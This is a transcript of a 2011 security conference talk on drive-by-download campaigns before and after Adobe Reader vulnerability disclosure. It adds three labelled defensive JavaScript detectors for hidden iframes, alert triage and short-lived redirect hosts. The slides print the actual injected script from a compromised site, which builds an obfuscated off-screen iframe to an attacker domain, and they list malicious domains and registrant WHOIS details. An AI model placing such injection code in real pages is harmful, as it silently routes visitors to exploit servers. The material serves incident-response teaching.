
Post on 27-May-2015


DESCRIPTION

International Security Conference "ZeroNights 2011" - http://www.zeronights.org/

TRANSCRIPT

Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure

Vladimir B. Kropotov, TBINFORM (TNK-BP Group)

Drive-By-Download

• Hackers distribute malware by "poisoning" legitimate websites

• Hacker injects malicious iframes into HTML content

• Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. are used by the attacker

You just want information about insurance, nothing more, but…

What does it look like? (slide diagram: the infection chain)

• PC connected to the Internet (sends OS, browser, plugins, etc. INFO)

• Known server with iframe

• Intermediate server controlled by attacker

• Exploit server controlled by attacker (delivers Exploit)

• Malware server controlled by attacker (delivers Malware)

• Host ready

How do we find it? An IDS alert:

  Date/Time            2011-08-05 10:44:53 YEKST
  Tag Name             PDF_XFA_Script
  Observance Type      Intrusion Detection
  Cleared Flag         false
  Target IP Address    10.X.X.X
  Target Object Name   9090
  Target Object Type   Target Port
  Target Service       unknown
  Source IP Address    10.X.X.Y
  SourcePort Name      2359
  :compressed          zlib
  :server              total.logeater.org
  :URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

DOES USER NEED IT??

First indicators

  Date/Time    2011-07-26 11:24:37
  Tag Name     PDF_XFA_Script
  arg          3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
  compressed   zlib
  server       mamjhvbw.dyndns.pro
  URL          /ghqlv3ym/

  Date/Time    2011-08-18 19:00:13
  Tag Name     ActiveX_Warning
  clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
  server       e1in.in
  URL          /stat/574a353789f/pda.js

  Date/Time    2011-08-16 13:24:44
  Tag Name     ActiveX_Warning
  clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
  server       skipetar.in
  URL          /jb/pda.js

  Date/Time    2011-08-18 19:00:13
  Tag Name     PDF_XFA_Script
  arg          host=http://e1in.in/stat&u=root
  compressed   zlib
  server       e1in.in
  URL          /stat/574a353789f/lastrger.php

  Date/Time    2011-08-09 10:17:14
  Tag Name     PDF_XFA_Script
  arg          host=http://inaptly.in&b=486def4
  compressed   gzip
  server       inaptly.in
  URL          /jb/lastrger.php

  Date/Time    2011-08-14 14:06:28
  Tag Name     PDF_XFA_Script
  arg          host=http://oligist.in&b=486def4
  compressed   gzip
  server       oligist.in
  URL          /jb/lastrger.php


Example: o-strahovanie.ru, SEP 02. The injected block sits between the markers "============ bbb ============" in the page source:

  document.xmlSettings.if_ik=false;
  if(window.localStorage){
    if(window.localStorage.if_ik){
      if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
    }else document.xmlSettings.if_ik=true;
  }else{
    // 4 osel  ("for the donkey": Russian slang for Internet Explorer; this is the no-localStorage branch)
    if(document.xmlSettings.getCookie('if_ik')){
      if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
    }else document.xmlSettings.if_ik=true;
  }
  if(document.xmlSettings.if_ik){
    if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
    else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
    document.xmlSettings.iframe=document.createElement('iframe');
    document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
    document.body.appendChild(document.xmlSettings.iframe);
    document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
  }

Decoded, the concatenated string is:

  iframe.src='http://disregarding.in/xtqd2/08.php'

Cookie left behind by the script:

  if_ik  1315314771  www.o-strahovanie.ru/  1600429305625633310239293001403230174358*

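The injected script above builds a 1px iframe, pushes it off-screen with a large negative `left`, and assembles `iframe.src` from string fragments so that a plain search of the page source for the hostname finds nothing. The block below is an added example, not code from the talk or from the affected site: a small Node.js scanner that folds such concatenations back together, flags iframes whose style hides them, and pulls out the re-arm interval (2592000 seconds on the slide, i.e. 30 days) that explains why a second visit from the same browser shows no iframe. `SAMPLE_PAGE` and the host `attacker-host.example` are constructed for this demo.

```javascript
// Added example (not from the talk): static scan of page source for the
// hidden-iframe injection pattern. SAMPLE_PAGE is constructed; the hostname
// attacker-host.example is a reserved placeholder, not a real indicator.

const SAMPLE_PAGE = `<html><body><p>Insurance quotes</p>
<script>
document.xmlSettings.if_ik=false;
if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
document.xmlSettings.iframe=document.createElement('iframe');
document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src='htt'+'p://'+'attacker-host.example/x'+'tqd2/08.p'+'hp';
</script>
<iframe src="https://partner.example/widget" width="300" height="250"></iframe>
</body></html>`;

// Fold chains of single-quoted literals joined with '+' ('htt'+'p://'...) into
// one literal. Only literal-to-literal concatenation is folded.
function foldStringConcat(src) {
  const chain = /'([^'\\]*)'(?:\s*\+\s*'([^'\\]*)')+/g;
  return src.replace(chain, (m) =>
    "'" + [...m.matchAll(/'([^'\\]*)'/g)].map((x) => x[1]).join('') + "'");
}

// Inline-style fragments that keep an iframe out of the user's view.
const HIDDEN_STYLE =
  /(?:height|width)\s*:\s*[01]px|left\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden/i;

function findHiddenIframes(html) {
  const folded = foldStringConcat(html);
  const findings = [];

  // 1) iframes built by script: createElement('iframe') ... .src='...'
  for (const script of folded.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = script[1];
    if (!/createElement\(\s*'iframe'\s*\)/i.test(body)) continue;
    const hidden = HIDDEN_STYLE.test(body);
    for (const m of body.matchAll(/\.src\s*=\s*'([^']+)'/g)) {
      findings.push({ kind: 'script-built iframe', src: m[1], hidden });
    }
  }

  // 2) static <iframe> tags, judged by their own attributes only
  for (const m of folded.matchAll(/<iframe\b([^>]*)>/gi)) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i) || [])[1] || '';
    findings.push({ kind: 'iframe tag', src, hidden: HIDDEN_STYLE.test(attrs) });
  }

  // 3) re-arm interval: "<stored timestamp> + N < now()" gates the injection,
  //    so a responder revisiting within N seconds will not see the iframe.
  const throttle = folded.match(/\+\s*(\d{5,})\s*<\s*[\w.]+\(\)/);
  return { findings, throttleSeconds: throttle ? Number(throttle[1]) : null };
}

// Only the hidden ones are worth an analyst's time; keep the interval with them.
function suspiciousIframes(html) {
  const { findings, throttleSeconds } = findHiddenIframes(html);
  return findings.filter((f) => f.hidden).map((f) => ({ ...f, throttleSeconds }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(suspiciousIframes(SAMPLE_PAGE), null, 2));
}
```

The throttle value is the practical takeaway for incident response: when a site owner reports the injection but a test browser shows nothing, check whether the page source carries a timestamp gate like `if_ik` before concluding the site is clean.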

Drive By Download o-strahovanie.ru Sep 02 (slide diagram)

• PC connected to the Internet (sends OS, browser, plugins, etc. INFO)

• Known server with iframe

• Intermediate server: disregarding.in

• Exploit server: NO (no Exploit served)

• Malware server: NO (no Malware served)

• Host ready

Drive By Download o-strahovanie.ru Sep 12 (slide diagram)

• PC connected to the Internet (sends OS, browser, plugins, etc. INFO)

• Known server with iframe

• Intermediate server: disregarding.in

• Exploit server: chamberwoman.in, janiculum.in (delivers Exploit)

• Malware server: chamberwoman.in, janiculum.in (delivers Malware)

• Host ready

Example: o-strahovanie.ru (WHOIS)

  Domain ID:            D5165642-AFIN
  Domain Name:          DISREGARDING.IN
  Created On:           14-Jul-2011 11:09:59 UTC
  Registrant Name:      Russell Rosario
  Registrant Street1:   136 Oakdale Avenue
  City:                 Winter Haven
  Registrant Country:   US
  Email:                russellsrosario@teleworm.com
  Name Server:          NS1.PRIDES.ME
  Name Server:          NS2.PRIDES.ME

  Domain Name:          JANICULUM.IN, CHAMBERWOMAN.IN
  Created On:           12-Sep-2011 08:14 UTC
  Registrant Name:      Russell Rosario

No Payload, because No Payload Requests?

Are they looking for customers?

Russell Rosario (same registrant, other domains)

  filtrated.in    Created On:14-Jul-2011 11:09:56 UTC
  raptnesses.in   Created On:14-Jul-2011 11:09:56 UTC
  tansies.in      Created On:14-Jul-2011 11:10:03 UTC

  Domain Name:               FILTRATED.IN
  Created On:                14-Jul-2011 11:09:53 UTC
  Sponsoring Registrar:      Directi Web Services Pvt. Ltd. (R118-AFIN)
  Registrant ID:             TS_16731618
  Registrant Name:           Russell Rosario
  Registrant Street1:        136 Oakdale Avenue
  Registrant City:           Winter Haven
  Registrant State/Province: Florida
  Registrant Postal Code:    33830
  Registrant Country:        US
  Registrant Phone:          +1.8635571308
  Email:                     russellsrosario@teleworm.com

But Sally Doesn't Know…

Attack before public disclosure

• Primary location for malicious sites: .IN

• Physical servers location by IP-Address: Romania

• Responsible person: Russell Rosario

• Domains are new

Domain owner is the same

  Domain Name      Created On                 Registrant Name
  irrefutably.in   15-Jul-2011 11:00:21 UTC   Russell Rosario
  comprador.in     25-Jul-2011 05:59:54 UTC   Russell Rosario
  hyalines.in      29-Jul-2011 09:39:33 UTC   Russell Rosario
  suffrago.in      01-Aug-2011 05:35:12 UTC   Russell Rosario
  ruritanian.in    01-Aug-2011 05:35:50 UTC   Russell Rosario
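The indicators above (fresh .IN domains, all behind one registrant) can be applied to IDS alerts automatically rather than by eye. The block below is an added example, not part of the talk: it takes alert records and WHOIS "Created On"/registrant data, both constructed here from values shown on the slides (`e1in.in` is deliberately left out of the WHOIS set to show how an unknown domain is scored), and ranks each alert by the domain's age at alert time, by whether its registrant also owns other alerting domains, and by TLD.

```javascript
// Added example (not from the talk): rank IDS alerts by the "before disclosure"
// indicators. ALERTS and WHOIS are constructed from values on the slides.

const ALERTS = [
  { time: '2011-08-09T10:17:14Z', tag: 'PDF_XFA_Script',  server: 'inaptly.in',  url: '/jb/lastrger.php' },
  { time: '2011-08-14T14:06:28Z', tag: 'PDF_XFA_Script',  server: 'oligist.in',  url: '/jb/lastrger.php' },
  { time: '2011-08-16T13:24:44Z', tag: 'ActiveX_Warning', server: 'skipetar.in', url: '/jb/pda.js' },
  { time: '2011-08-18T19:00:13Z', tag: 'PDF_XFA_Script',  server: 'e1in.in',     url: '/stat/574a353789f/lastrger.php' },
];

// Local WHOIS cache; e1in.in intentionally absent.
const WHOIS = {
  'inaptly.in':      { created: '2011-08-05T07:15:05Z', registrant: 'Russell Rosario' },
  'oligist.in':      { created: '2011-08-05T07:13:12Z', registrant: 'Russell Rosario' },
  'skipetar.in':     { created: '2011-08-05T07:14:21Z', registrant: 'Russell Rosario' },
  'disregarding.in': { created: '2011-07-14T11:09:59Z', registrant: 'Russell Rosario' },
};

const DAY_MS = 86400 * 1000;

// Age of the domain, in days, at the moment the alert fired.
function domainAgeDays(alertTime, createdOn) {
  return (Date.parse(alertTime) - Date.parse(createdOn)) / DAY_MS;
}

// Distinct alerting domains per registrant (the "domain owner is the same" check).
function alertingDomainsByRegistrant(alerts, whois) {
  const map = new Map();
  for (const a of alerts) {
    const rec = whois[a.server];
    if (!rec) continue;
    if (!map.has(rec.registrant)) map.set(rec.registrant, new Set());
    map.get(rec.registrant).add(a.server);
  }
  return map;
}

// One row per alert, highest score first. Each reason is a human-readable
// justification so the analyst can see why a row floated to the top.
function triage(alerts, whois, { maxAgeDays = 30, campaignTlds = ['.in'] } = {}) {
  const byRegistrant = alertingDomainsByRegistrant(alerts, whois);
  return alerts.map((a) => {
    const rec = whois[a.server];
    const reasons = [];
    if (!rec) {
      reasons.push('no WHOIS record available; treat as unknown, not as clean');
    } else {
      const age = domainAgeDays(a.time, rec.created);
      if (age < maxAgeDays) reasons.push(`domain only ${age.toFixed(1)} days old at alert time`);
      const peers = byRegistrant.get(rec.registrant).size - 1;
      if (peers > 0) reasons.push(`registrant "${rec.registrant}" shared with ${peers} other alerting domain(s)`);
    }
    const tld = a.server.slice(a.server.lastIndexOf('.'));
    if (campaignTlds.includes(tld)) reasons.push(`TLD ${tld} matches the observed campaign`);
    return { server: a.server, tag: a.tag, time: a.time, score: reasons.length, reasons };
  }).sort((x, y) => y.score - x.score);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const row of triage(ALERTS, WHOIS)) console.log(row.score, row.server, row.reasons.join('; '));
}
```

A missing WHOIS record is scored as a reason in its own right: at the time of the talk the domains were unknown to spam lists, AV vendors and Safe Browsing, so absence of reputation data must not be read as a clean verdict.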

20-Jul-2011: Acrobat vulnerability, vendor notified. Vulnerabilities reported to the vendor:

• VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability

• VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability

• VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability

• VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability

X. DISCLOSURE TIMELINE

-----------------------------

2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers

2011-09-14 - Public disclosure

ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability

-- Disclosure Timeline:

2011-07-20 - Vulnerability reported to vendor

2011-10-26 - Coordinated public release of advisory

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability

-- Disclosure Timeline:

2011-07-20 - Vulnerability reported to vendor

2011-10-27 - Coordinated public release of advisory

Harvesting machine started

  Domain Name        Created On                 Registrant Name
  microdrili.in      05-Aug-2011 07:13:08 UTC   Russell Rosario
  oligist.in         05-Aug-2011 07:13:12 UTC   Russell Rosario
  provost.in         05-Aug-2011 07:13:18 UTC   Russell Rosario
  vaginalitis.in     05-Aug-2011 07:13:25 UTC   Russell Rosario
  kremlinology.in    05-Aug-2011 07:13:35 UTC   Russell Rosario
  invariance.in      05-Aug-2011 07:13:41 UTC   Russell Rosario
  alleghenian.in     05-Aug-2011 07:13:48 UTC   Russell Rosario
  dandifies.in       05-Aug-2011 07:14:06 UTC   Russell Rosario
  xenophoby.in       05-Aug-2011 07:14:09 UTC   Russell Rosario
  alliaria.in        05-Aug-2011 07:14:15 UTC   Russell Rosario
  skipetar.in        05-Aug-2011 07:14:21 UTC   Russell Rosario
  inaptly.in         05-Aug-2011 07:15:05 UTC   Russell Rosario
  allhallowtide.in   05-Aug-2011 07:15:20 UTC   Russell Rosario

But maybe someone knows?

• Spamlists

• AV Vendors

• Safebrowsing

• Securityfocus

Spamlists, Aug 19

AV Vendors, Aug 18

Safebrowsing Aug 20

Securityfocus Sep 07

  Sent: Wednesday, September 07, 2011 11:31 PM
  Subject: There is a strange get request header in all web pages of my site? I'm worried about a Trojan attack!

  Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"

PDF vulnerabilities public disclosure Sep 14. What to expect?

NO GOOD NEWS, JUST EPIC FAIL for site administrators

No good news. Hundreds of domains were registered

ITALIA-NEW.IN

BANER-KLERK.RU

BANK-KLERK.RU

BANNER-KLERK.RU

BLOGS-KLERK.RU

BUH-KLERK.RU

DAILY-KP.RU

FORUM-KLERK.RU

I-OBOZREVATEL.RU

INTERFAX-REGION.RU

JOB-KLERK.RU

KLERK-BANK.RU

KLERK-BANKIR.RU

KLERK-BIZ.RU

KLERK-BOSS.RU

KLERK-BUH.RU

KLERK-EVEN.RU

KLERK-EVENTS.RU

KLERK-LAW.RU

KLERK-NEW.RU

KLERK-NEWS.RU

KLERK-REKLAMA.RU

KLERK-RU.RU

KLERK-WORK.RU

KLERK2.RU

OBOZREVATEL-RU.RU

OBOZREVATELRU.RU

WIKI-KLERK.RU

PRESS-RZD.RU

RZD-RZD.RU

IPGEOBASE.IN

* * *

“New generation” (slide diagram)

• PC connected to the Internet (sends OS, browser, plugins, etc. INFO)

• Known server with iframe

• Intermediate server controlled by attacker

• Exploit server controlled by attacker (delivers Exploit)

• Malware server controlled by attacker (delivers Malware)

• Other known server NOT controlled by attacker

• Host ready

Attack after public disclosure

• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,…

• Physical servers location by IP-Address: International

• Domains registered to different spurious persons

• Domain lifetime ~ time to Blacklists appearance

• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)

• If you don't know exact malware URL, site redirects to well known server

• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
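The blacklist-evasion pattern in the bullets above (a known site refers visitors to a fresh host only for a short window, then that host goes quiet, and its lifetime is about the time it takes to land on a blacklist) shows up in proxy logs as a destination host with a single referring site, several distinct clients and a short activity window. The block below is an added example, not code from the talk: it parses constructed log lines (the field layout and the `.example` hostnames are this demo's own) and reports hosts that fit that profile while leaving long-lived hosts such as a CDN alone.

```javascript
// Added example (not from the talk): find short-lived redirect targets in proxy
// logs. PROXY_LOG is constructed; the layout is this demo's own:
//   <ISO time> <client IP> <method> <host> <path> <referer or "-">
const PROXY_LOG = `
2011-09-20T08:00:01Z 10.1.1.10 GET news-site.example / -
2011-09-20T08:00:02Z 10.1.1.10 GET fresh-host.example /x/a.php http://news-site.example/
2011-09-20T08:05:10Z 10.1.1.22 GET news-site.example /story/1 -
2011-09-20T08:05:11Z 10.1.1.22 GET fresh-host.example /x/a.php http://news-site.example/story/1
2011-09-20T08:05:12Z 10.1.1.22 GET cdn.example /lib.js http://news-site.example/story/1
2011-09-21T10:00:00Z 10.1.1.31 GET news-site.example /story/2 -
2011-09-21T10:00:01Z 10.1.1.31 GET news-site.example /promo/index.html http://news-site.example/story/2
2011-09-22T11:00:00Z 10.1.1.40 GET cdn.example /lib.js http://news-site.example/
`;

const HOUR_MS = 3600 * 1000;

// One object per log line; the referer is reduced to its hostname.
function parseLog(text) {
  return text.trim().split('\n').map((line) => {
    const [time, client, method, host, path, referer] = line.trim().split(/\s+/);
    let refHost = null;
    if (referer && referer !== '-') {
      try { refHost = new URL(referer).hostname; } catch (e) { refHost = null; }
    }
    return { time: Date.parse(time), client, method, host, path, refHost };
  });
}

// Per destination host: activity window, referring hosts (excluding itself),
// distinct clients and hit count.
function hostProfiles(entries) {
  const profiles = new Map();
  for (const e of entries) {
    if (!profiles.has(e.host)) {
      profiles.set(e.host, { host: e.host, first: e.time, last: e.time, hits: 0,
                             referers: new Set(), clients: new Set() });
    }
    const p = profiles.get(e.host);
    p.first = Math.min(p.first, e.time);
    p.last = Math.max(p.last, e.time);
    p.hits += 1;
    if (e.refHost && e.refHost !== e.host) p.referers.add(e.refHost);
    p.clients.add(e.client);
  }
  return [...profiles.values()];
}

// Hosts reached only from one other site, by several clients, inside a short
// window. A CDN also has one referer but stays active for days, so the window
// check is what separates the two.
function shortLivedRedirectTargets(text, { maxWindowHours = 24, minClients = 2 } = {}) {
  return hostProfiles(parseLog(text))
    .filter((p) => {
      const windowHours = (p.last - p.first) / HOUR_MS;
      return p.referers.size === 1 && p.clients.size >= minClients && windowHours <= maxWindowHours;
    })
    .map((p) => ({
      host: p.host,
      via: [...p.referers][0],
      clients: p.clients.size,
      hits: p.hits,
      windowHours: Number(((p.last - p.first) / HOUR_MS).toFixed(2)),
    }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(shortLivedRedirectTargets(PROXY_LOG));
}
```

Run this over a window that starts well before the suspected compromise: the "short window" is only meaningful when the host's first-seen time in your own logs is known, and a host that was last seen hours ago is exactly the one that will no longer resolve when you try to fetch its payload for analysis.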

Known sites examples: RZD.RU (Russian railroads)

Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)

Other examples: EG.RU (newspaper, 263 685 visits per day)

Other examples: svpressa.ru (newspaper 276 720 visits per day)

Malware examples: Banks targeted attack

• Legal

• Faked

Another news, another phone…

Malware examples

Script examples

Sample analysis (Virus Total)

What can we do?

• Patch endpoint

• Tighten the Internet filtering (default deny if possible)

• No Internet surfing with admin rights

• See what’s happening (continuous monitoring)

• Check if you’re well (regular technical audits)

• Educate people

Credits

• Sergey V. Soldatov,

TBINFORM (TNK-BP Group)

• Konstantin Y. Kadushkin,

TBINFORM (TNK-BP Group)

• Wayne Huang,

ARMORIZE

THE END

Vladimir B. Kropotov, Information security analyst, TBINFORM (TNK-BP Group)

vbkropotov@tnk-bp.com

kropotov@ieee.org
